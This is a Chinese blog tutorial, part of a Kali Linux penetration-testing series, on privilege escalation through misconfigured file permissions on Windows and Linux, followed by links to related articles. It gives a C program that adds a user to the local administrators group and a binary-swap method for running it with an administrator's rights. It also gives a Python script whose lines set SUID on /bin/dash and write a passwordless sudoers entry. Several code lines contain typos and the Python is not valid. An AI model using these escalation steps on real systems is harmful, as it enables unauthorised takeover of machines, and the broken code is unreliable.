kali Linux渗透测试之第三方提权(三)——利用配置文件不当提权

最新推荐文章于 2023-04-28 19:11:33 发布
最新推荐文章于 2023-04-28 19:11:33 发布
阅读量739 收藏 4
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45116657/article/details/99716719
版权

利用漏洞提权:

  • 前提:已经成功渗透进入目标系统;
  • 目标:利用系统本身的漏铜进行提权;
    .

利用配置不当提权:
与漏洞提权相比,利用配置不当提权更为常见。大部分企业环境下,会有相应的补丁跟新策略,因此难以通过相应的漏洞进行入侵。因此,当入侵一台服务器候找不到漏洞,可利用配置不当提权。如:

  • 前提:已经成功渗透进入目标系统;
  • 可以查找系统中以system权限启动的而服务或应用,可以尝试将其替代或者反弹shell的方式提权;
  • 可以查找NTFS权限允许users修改删除的应用,利用配置不当进行提权;
  • 代码中是否有过滤参数的操作等都可以利用,进行提权。

一、windows系统下查找权限设置不当的程序(Windows server 2003、win7以后的系统中包含的程序)

1、查找exe执行程序的NTFS权限;

命令:icacls c:\Windows*.exe /save perm /T

  • c:\Windows*.exe ——>指定c:\Windows\目录下,所有的exe文件;
  • /save perm:将查询结果保存到文本文件perm中;
  • /T:当前目录以及子目录下所有满足条件的文件;

在这里插入图片描述
输入命令dir,可以看到生成的perm文件。

在这里插入图片描述

2、在perm文件中查找含有字符串为FA;;;BU的exe执行程序,表示普通用户具有完全的权限,将其作为潜在的攻击目标。一般情况下,普通用户对操作系统中的文件都没有修改的权限。
  • FA:完全控制权限;
  • BU:即bulit user,默认的普通用户,当它的权限为完全控制时,就是我们要找的程序A。在windows系统中默认没有这种权限,只有当管理员配置不当时,才存在这种情况;
  • PU:power user

在这里插入图片描述

3、如果找到系统中某个应用程序A,普通用户user时对其具有完全控制权限的,我们可以先将A程序重命名为其他名字,然后将admin.exe重命名为A,这样当管理员下次执行A程序时,实际执行的是admin.exe程序,即普通用户user添加的本地管理员组。

操作过程
在kali上准备admin.c文件,将其编译成可执行程序(即将admin.c的C语言程序编译成在windows中可以执行admin.exe文件),然后想办法拷贝到Windows 2003上,执行admin.exe程序将用户user添加到本地管理员组中。

admin.c文件内容:

#include <stdlib.h>
int main()
{
   int i;
   i=system("net localgroup administarators a /add");
   return 0'
}

编译方法:

i586-mingw32msvc-gcc -o admin.exe admin.c

二、linux系统下查找权限设置不安全的程序

1、查看/目录下文件权限为777的所有文件,并列出详细信息;
  • ls -l ——> #查找当前目录下所有文件的权限;
  • find / -perm 777 -exec ls -l {} ; ——> # -perm 777 — 查找所有权限为777的文件;
  • -exec ——> 执行 ls -l ;
  • ; ——> find命令以其结束;

在这里插入图片描述
在这里插入图片描述

2、find / -writable -type f 2>/dev/null |grep -v “/proc/” #查看/目录下所有可写的文件;
  • 2 ——> 错误标志位,不满足条件的放入/dev/null;
  • /dev/null ——> 类似于垃圾箱,丢弃;
  • grep -v “/proc/” ——> 反向查找,不找/proc/;

在这里插入图片描述

三、提权

思路:渗透进入的是应用程序,可查看引用系统的配置文件

  • 通过应用连接数据库的配置文件,发现其连接的服务账号;
  • 后台服务运行账号,有可能root账号运行web服务;

四、编辑python提权

自己编辑python脚本的路径为:vim /usr/lib/log/sudi.py

注意:在/usr/lib的路径下通过mkdir命令建立一个log目录,然后通过以上命令进行编译;

代码内容如下:

#!/usr/bin/env python
#

import os
import sys

try:
#       os.system('rm -r /tmp/*')
#       os.system('cp /bin/sh /tmp/sh')
#       os.system('chmod u+s /bin/dash')
#       os.system('echo "redhat ALL=(ALL) NOPASSWD: ALL" > /etc/sudores')
except:
        sys.exit()
1、通过执行/bin/dash获取root管理员权限

1.1>
在这里插入图片描述
1.2> 以普通用户hacker登录,执行/bin/dash,可以看到,权限提升为root在这里插入图片描述

2、将普通用户放到sudo组里面获取管理员权限;

2.1> 通过执行echo “redhat ALL=(ALL) NOPASSWD: ALL” > /etc/sudores命令获取管理员权限;

在这里插入图片描述

weixin_45116657
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
操作系统权限提升(六)之系统错误配置-不安全的服务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 1159
通常 Windows服务都是以 System权限运行的,当由于系统管理员错误配置导致低权限用户可以对某些服务修改时,可以通过修改服务启动文件的路径“ binpath”,将其替换为恶意程序的路径,这样服务启动时便会运行恶意程序
Kali Linux 高级渗透测试(原书第2版)(带详细目录)
06-18
KaliLinux面向专业的渗透测试和安全审计,集成了大量精心挑选的安全检测工具。本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者“杀链”采取的具体步骤。通过阅读本书读者能快速学习并掌握渗透测试方法和工具。
LINUX提权第三方服务提权
ALLEN'Blog
12-14 643
总结了一下第三方服务器提权,相比于其他提权方法还是挺简单的,只需要找到对应第三方服务的漏洞即可尝试提权,当然我们也可以在MSF里找到对应的payload,仔细学习一下还是挺好理解的,本文就讲到这里,喜欢的话不妨一键连。
限流算法之令牌桶算法、漏铜算法
青鬆下的ミ坚躯 的个人博客
01-14 996
常见的限流算法有:令牌桶、漏桶。计数器也可以用来进行粗暴限流实现。 令牌桶算法: 令牌桶算法,是一个存放固定容量令牌的桶,按照固定速率往桶里添加令牌。令牌桶算法的描述如下。 假设限制2r/s,则按照500毫秒的固定速率往桶中添加令牌。 桶中最多存放b 个令牌,当桶满时,新添加的令牌被丢弃或拒绝。 当一个n 个字节大小的数据包到达,将从桶中删除n 个令牌,接着数据包被发送到网络上。 如果...
Linux环境下Weblogic SSRF漏洞修复
哎呦喂
03-19 3653
方法一:以修复的直接方法是将SearchPublicRegistries.jsp直接删除就好了;方法二:1.删除uddiexplorer文件夹2.限制uddiexplorer应用只能内网访问方法:(常用)Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的Se...
Nginx限流板斧--漏桶算法、令牌桶算法、计数器算法
u014225032的博客
10-21 1022
限流算法总结大全
《黑客之道》- 全网最详细的kali系统安装教程
xueshenlaila的博客
10-29 2733
Kali Linux是一个基于Debian的Linux发行版,旨在进行高级渗透测试和安全审计。Kali Linux包含数百种工具,适用于各种信息安全任务,如渗透测试,安全研究,计算机取证和逆向工程。Kali Linux由公司Offensive Security开发,资助和维护。 Offensive [əˈfensɪv] 攻击性的; Offensive Security 进攻性安全 Kali Linux于2013年3月13日发布,Kali的前身是基于BackTrack Linux,自上而下的重建
Kali Linux渗透测试提权(一)——本地提权
weixin_45116657的博客
08-18 1880
本地提权: 目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离。针对不同的应用——对应不同的账户——不同的账户在对应不同的权限; 本地提权一般用于已经获取到了本地低权限的账号,希望获取更高的权限,实现对目标的进一步控制; 简单而言,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限,权限控制是WINDOWS、Linux系统安全的基石,也是一切安全软件的基...
kali】29 提权—— 利用漏洞提权
(∪.∪ )...zzz的博客
11-27 7895
这里写自定义目录标题一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限1. Ms011-080 对应补丁 Kb25927992. kali集成了exploit3. 查看.py4. 生成.exe5. 运行exe提权成功二、Win7 使用 Ms14-068 获取 域控制器的权限1.win2003搭建域控制器2. 修改win2003域控制器的用户权限利用 CVE-2012-0056 提升 linux 权限 一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限 1. Ms0
linux 安全模式 提权,kali权限提升之配置不当提权与WCE
weixin_32591379的博客
05-15 423
kali权限提升之配置不当提权与WCE1.利用配置不当提权2.WCE3.其他提权一、利用配置不当提权与漏洞提权相比更常用的方法在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵。当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行提权。如:代码中没有进行参数过滤等操作。1.通过查看哪些服务默认以system权限启动,可尝试将其替换或绑定反弹shell...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
Kali Linux渗透测试技术详解
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
Kali Linux高级渗透测试 _2016.05_罗伯特_KaliLinux高级渗透测试_渗透_完整版_
09-29
P226
漏铜桶、令牌桶算法
u014244856的博客
04-28 94
漏铜桶算法
OpenSNS后台文件上传漏铜分析
weixin_30369087的博客
07-06 295
前言   这几天正在想找个文件上传漏洞分析一波,以加深对文件上传漏洞的理解,正好看到FreeBuf的一片文章记对OpenSNS的一次代码审计,由于其只对漏洞进行复现,故在此进行代码层面的分析。 漏洞分析   已知漏洞产生点:./Application/Admin/Controller/ThemeController.class.php 第170行      跟入upload函数(...
小白日记21:kali渗透测试提权(一)--本地提权
ZiXuanFY的博客
09-23 5862
本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限。权限提升漏洞通常是一种“辅助”性质的漏洞,当黑客已经通过某种手段进入了目标机器后,可以利用他进入更高的状态。但并不是说这种漏洞不严重、难以利用,往往这种漏洞更容易被利用、带来的后果比远程漏洞更可怕,这种漏洞实际上远比远程漏洞稀有,往往一个微软本地提权漏洞在国外的价格就可以到几百万美金。因为远程漏
Kali实战-提权
小水池
05-28 4541
本地提权 windows默认账号 user Administrator System #最高权限 关系图示: Linux默认账号 User Root ADMIN提权为SYSTEM 思路:利用windows中以system运行的程序进行操作,将系统提权 win xp、win2003 at 18:12(时间) /interactive cmd ...
Kali Linux渗透测试提权(一)——本地提权
橘子女侠
04-23 7242
本地提权 目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离,针对不同的应用,对应不同的账户,不同的账户在对应不同的权限; 本地提权一般用于已经获取到了本地低权限的账号,希望获取更高的权限,实现对目标的进一步控制; 简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限,权限控制是WINDOWS、Linux系统安全的基石,也是一切安全软件的基...
led-Opt.Bak
最新发布
05-21
毕设&课设&项目&实训- 【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。 包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】: 所有源码都经过严格测试,可以直接运行。 功能在确认正常工作后才上传。 【适用人群】: 适用于希望学习不同技术领域的小白或进阶学习者。 可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】: 项目具有较高的学习借鉴价值,也可直接拿来修改复刻。 对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】: 有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。 鼓励下载和使用,并欢迎大家互相学习,共同进步。
kali linux渗透测试靶机
02-23
Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值